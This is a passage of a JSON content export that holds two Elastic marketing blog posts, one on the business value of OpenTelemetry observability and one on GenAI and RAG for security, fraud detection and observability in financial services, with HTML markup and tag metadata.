donations, including the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/ecs-elastic-common-schema-otel-opentelemetry-announcement\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Common Schema\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/elastic-profiling-agent-acceptance-opentelemetry\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUniversal Profiling\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — helps ensure that organizations have the tools they need to succeed.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEmerging trends that OpenTelemetry is well-positioned to address:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eEdge computing and IoT observability requirements\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI/machine learning (ML) system monitoring needs\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCross-cloud service mesh observability\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSecurity telemetry integration\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Taking the next step","_metadata":{"uid":"cs87fcf5fe599c211b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eStart by evaluating how accessible your current observability practices are across your organization \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eby considering:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow many different teams need to understand your telemetry data?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhat expertise barriers exist for teams trying to use observability data?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHow unified are your current data collection pipelines?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhat's the total effort required to maintain your current observability tooling?\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMeasure your progress through:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIncreased accessibility of observability data across teams\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eReduction in time spent maintaining multiple collection mechanisms\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eImproved correlation between different types of telemetry data\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFaster onboarding of new teams to observability practices\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eReduced complexity in telemetry pipelines\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe transition to OpenTelemetry isn't just about better tooling — it's also about making observability accessible and valuable for everyone in your organization. By embracing open standards and simplified pipelines now, you position your teams to focus on what matters most: building and improving your applications. Start your journey today and join the growing community of organizations making observability work for everyone.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eReady to make observability more accessible? Visit elastic.co/observability to discover how Elastic and OpenTelemetry can simplify your observability practice.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc5cf78dc1ef8c97e"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs8c471d5483083b61"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eResources to support your journey:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/observability-labs/blog/elastic-distributions-opentelemetry\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFind out about Elastic Distributions of OpenTelemetry (EDOT)\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/virtual-events/benefits-of-opentelemetry\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCheck out this virtual event on the benefits of OpenTelemetry\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/contact\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eConnect with our community of OpenTelemetry practitioners\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7fa74d08893954f8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf37db6abb6f2f87a"}}}],"publish_date":"2025-01-30","sanity_migration_complete":false,"seo":{"seo_title_l10n":"OpenTelemetry: The key to modern enterprise observability | Elastic","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Transform your organization's observability strategy with open standards and simplified data collection","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc2c6579373c53341","ACL":{},"created_at":"2021-07-12T21:53:13.753Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"apm","label_l10n":"APM","tags":[],"title":"APM","updated_at":"2021-07-12T21:53:13.753Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.194Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt85414c8cbf30b724","ACL":{},"created_at":"2023-11-06T21:52:01.987Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"universal-profiling","label_l10n":"Universal profiling","tags":[],"title":"Universal profiling","updated_at":"2023-11-06T21:52:01.987Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.852Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt47e752b219d104d3","ACL":{},"created_at":"2021-07-12T21:53:40.554Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"metrics","label_l10n":"Metrics","tags":[],"title":"Metrics","updated_at":"2021-07-12T21:53:40.554Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.103Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt4ce45bbfeeff0638","ACL":{},"created_at":"2021-07-12T21:53:30.326Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"logs","label_l10n":"Logs","tags":[],"title":"Logs","updated_at":"2021-07-12T21:53:30.326Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.411Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltb249a1eeba77b317","ACL":{},"created_at":"2020-06-17T03:31:53.522Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"apm","label_l10n":"APM","tags":[],"title":"APM","updated_at":"2020-07-06T22:20:22.552Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.550Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt9f3033eaacd184dd","ACL":{},"created_at":"2022-09-13T16:43:44.540Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"logstash","label_l10n":"Logstash","tags":[],"title":"Logstash","updated_at":"2022-09-13T16:43:44.540Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.249Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt60e4f8c6c19cebb7","ACL":{},"created_at":"2020-06-17T03:32:19.868Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"metrics","label_l10n":"Metrics","tags":[],"title":"Metrics","updated_at":"2020-07-06T22:20:08.577Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.406Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt07f982aff596b895","_version":1,"title":"Office-building (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-30T16:47:10.831Z","updated_at":"2025-01-30T16:47:10.831Z","content_type":"image/jpeg","file_size":"127924","filename":"Office-building_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-30T17:00:18.920Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt07f982aff596b895/679bad0e025d43258b731030/Office-building_(1).jpg"},"title":"Realizing the business value of OpenTelemetry-native observability","title_l10n":"Realizing the business value of OpenTelemetry-native observability","updated_at":"2025-01-30T16:47:51.017Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/opentelemetry-native-observability-business-value","publish_details":{"time":"2025-01-30T17:00:18.306Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt843656697b4bc8bf","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"GenAI and RAG are transforming financial services by enhancing security, detecting fraud, and improving observability. These AI tools enable real-time insights, proactive defenses, and better decision-making to stay innovative and competitive.","author":["bltce462b8f0bc7868a"],"category":["bltc17514bfdbc519df"],"created_at":"2025-01-27T18:45:11.477Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"GenAI is not magic","_metadata":{"uid":"csa0012d526d875e73"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eI attended ElasticON recently \u003c/span\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003ewhere we spent the day with our NYC Elastic community, talking about the combined value of vector databases using retrieval augmented generation (RAG) to feed large language models (LLMs) for next-level generative AI (GenAI) results.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003eElastic’s CTO and Founder \u003c/span\u003e\u003ca href=\"https://www.elastic.co/about/leadership\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eShay Banon\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003e kicked off his \u003c/span\u003e\u003ca href=\"https://www.elastic.co/events/elasticon/archive\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ekeynote\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003e with an important message: \u003c/span\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003e\u003cstrong\u003eGenAI is not magic\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003eShay explained that AI is a step function change in how organizations maximize unstructured data. With AI, all of an organization’s data is now worth \u003c/span\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003e\u003cstrong\u003e10x\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(51, 51, 51);font-size: 12pt;\"\u003e more than before AI if it’s used properly. \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIt may not be magic, but 10x value on data is intriguing — especially if you’re a financial services company swimming in structured and unstructured data that you don’t know what to do with. You might be spending a lot of money to store that data. Digging deeper into how to get to that 10x isn’t that complicated.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"How are AI and generative AI different?","_metadata":{"uid":"cs67df67ef407bf099"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMany people ask what the difference is between AI and GenAI as they seem to be used interchangeably. The best way to describe it is: \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003etraditional AI systems are rigid and struggle to adapt to new, unforeseen situations without manual intervention. Generative AI is more flexible and capable of learning from large and diverse datasets and adapting to novel scenarios\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e.\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenAI needs data to perform. Vector databases are able to house a tremendous amount of structured and unstructured data. With vector databases, you have the base foundation of data to begin your GenAI journey.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLLMs like OpenAI, Gemini, and Perplexity are fed a steady diet of data from the internet. That’s like eating junk food every day while training for the AI Olympics.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Making the most of GenAI with RAG","_metadata":{"uid":"cs654dbdd397d892aa"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you want GenAI outputs with enhanced relevance and far fewer hallucinations (errors), you will need to use the RAG method. It’s a method used by developers to connect LLMs with external data sources from vector databases, such as a company’s private information, so that it can provide more personalized, accurate, and relevant responses. The RAG technique enables an AI model to reference any data stored in a vector database, which can include a company’s emails, documents and PDFs, spreadsheets and databases, and images and audio files.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThat’s how you create next-level AI outputs in data-heavy financial services companies.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWith this in mind, my takeaways from the discussion at ElasticON made me think about operational transformation in financial services. Like many customer-facing industries, the financial services sector is on the brink of major operational transformation, driven by the integration of GenAI. It’s reshaping how financial services companies approach security, fraud prevention, and observability — delivering operational efficiencies while tackling evolving threats. For financial services companies, understanding how to deploy GenAI most effectively is essential to staying secure and operational in an increasingly threatening and highly regulated environment.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Revolutionizing security with GenAI","_metadata":{"uid":"cs2d0dc043da18614e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe financial services industry faces escalating cybersecurity threats as attacks grow in both scale and sophistication. GenAI is transforming security measures by analyzing massive datasets to detect vulnerabilities and predict emerging threats with exceptional accuracy. By using adaptive learning, GenAI can identify anomalies in real time, enabling proactive defenses that traditional tools often miss.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor example, cybersecurity platforms can integrate GenAI to simulate potential cyber attacks and stress-test the resilience of financial networks. By mimicking real-world attack patterns, these tools can identify weak points and recommend strategic improvements before breaches occur.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRAG is emerging as a breakthrough innovation for business applications and workflows. By combining real-time data retrieval with AI analysis, RAG can deliver contextual threat intelligence. For instance, during a live attack attempt, RAG could pull historical data on similar breaches to provide actionable insights, enabling faster response times and minimizing damage.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Advancing fraud detection and prevention","_metadata":{"uid":"cse138dc2bd4aeae4d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe financial sector faces a growing challenge: AI-generated fraud. Criminals are using advanced technologies to create synthetic identities and bypass traditional safeguards. GenAI offers a countermeasure by analyzing behavioral patterns and transaction anomalies to identify fraudulent activities with unmatched precision.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor example, a credit card company can integrate AI into its fraud-prediction systems. By analyzing transaction data in real time, these systems can detect and replace compromised cards before misuse occurs. Generative AI enhances these capabilities by synthesizing past fraud patterns to predict future threats more effectively.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRAG is emerging as a game-changer in this space by providing contextual insights that enable faster fraud detection and prevention. For instance, RAG could pull historical data on similar fraud cases to inform live decision-making, reducing false positives and improving accuracy.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Enhancing observability for operational excellence","_metadata":{"uid":"csaeec6e7f12ba7a5f"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eObservability — the ability to monitor, analyze, and improve system performance — is critical for maintaining the trust of customers and regulators. GenAI contributes significantly to observability by processing unstructured data and offering real-time insights into complex systems.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA large percentage of financial services organizations are already using Elastic for observability. By implementing Elastic's AI-driven observability solutions, companies are monitoring systems proactively, identifying bottlenecks, and ensuring regulatory compliance. These tools enable a granular understanding of operational processes, enhancing reliability and customer satisfaction.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFurthermore, GenAI-driven observability enhances the ability to handle unexpected events. For example, during periods of high volatility, AI models can adjust monitoring priorities — ensuring that critical functions remain uninterrupted.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Strategic imperatives for C-level FSI executives","_metadata":{"uid":"cs3f7b25124714a3aa"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo fully use GenAI and its applications in security, fraud prevention, and observability, C-level financial services leaders should prioritize the following strategies:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInvest in AI talent:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Build internal expertise by hiring and upskilling professionals adept in machine learning (ML) and AI technologies.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAdopt ethical AI practices:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Implement clear governance frameworks to address biases, ensure transparency, and safeguard data privacy.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUse partnerships:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Collaborate with technology providers like Elastic to deploy cutting-edge solutions tailored to industry needs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIntegrate RAG capabilities:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Enhance AI decision-making and limit AI hallucinations by incorporating retrieval augmented generation into critical workflows.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"The road ahead in 2025","_metadata":{"uid":"csf15a798598b62f01"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs Shay closed out ElasticON NYC, he commented that he hadn’t been this excited about technology since the launch of the internet with regard to the potential of AI.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe integration of GenAI into financial services is not just a technological upgrade; it’s also a strategic imperative. By using these tools, institutions can enhance their defenses against cyber threats, outsmart fraudsters, and optimize operations with unparalleled precision. As the sector continues to evolve, C-level leaders who embrace AI innovations will be well positioned to lead their organizations into a secure and efficient future.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor more insights on how to integrate AI into your organization, explore what’s possible with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/industries/financial-services\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic financial services\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://youtu.be/M7Pla2pIosg?feature=shared\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLearn more\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e about how Elastic is empowering our customers to maximize their AI investments by extracting data in a meaningful way with RAG from our CEO Ashutosh Kulkarni.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eJoin us for \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethe\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/events/fsi-summit-2025\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Financial Services Summit\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e on February 20, 2025, where leaders from Swift, Société Générale, BBVA, Payplug, Allianz Technology, and more will tackle the most critical challenges shaping the future of financial services including AI advancements.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9c7f31a9b88bf8dd"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs210c5517671ad49c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf479e83daaa80e82"}}}],"publish_date":"2025-01-27","sanity_migration_complete":false,"seo":{"seo_title_l10n":"GenAI and RAG: Transforming security, fraud detection, and observability","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","title":"Anomaly detection","label_l10n":"Anomaly detection","keyword":"anomaly-detection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7478459fe32592c5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:06.777Z","updated_at":"2023-11-06T20:08:06.777Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.738Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data 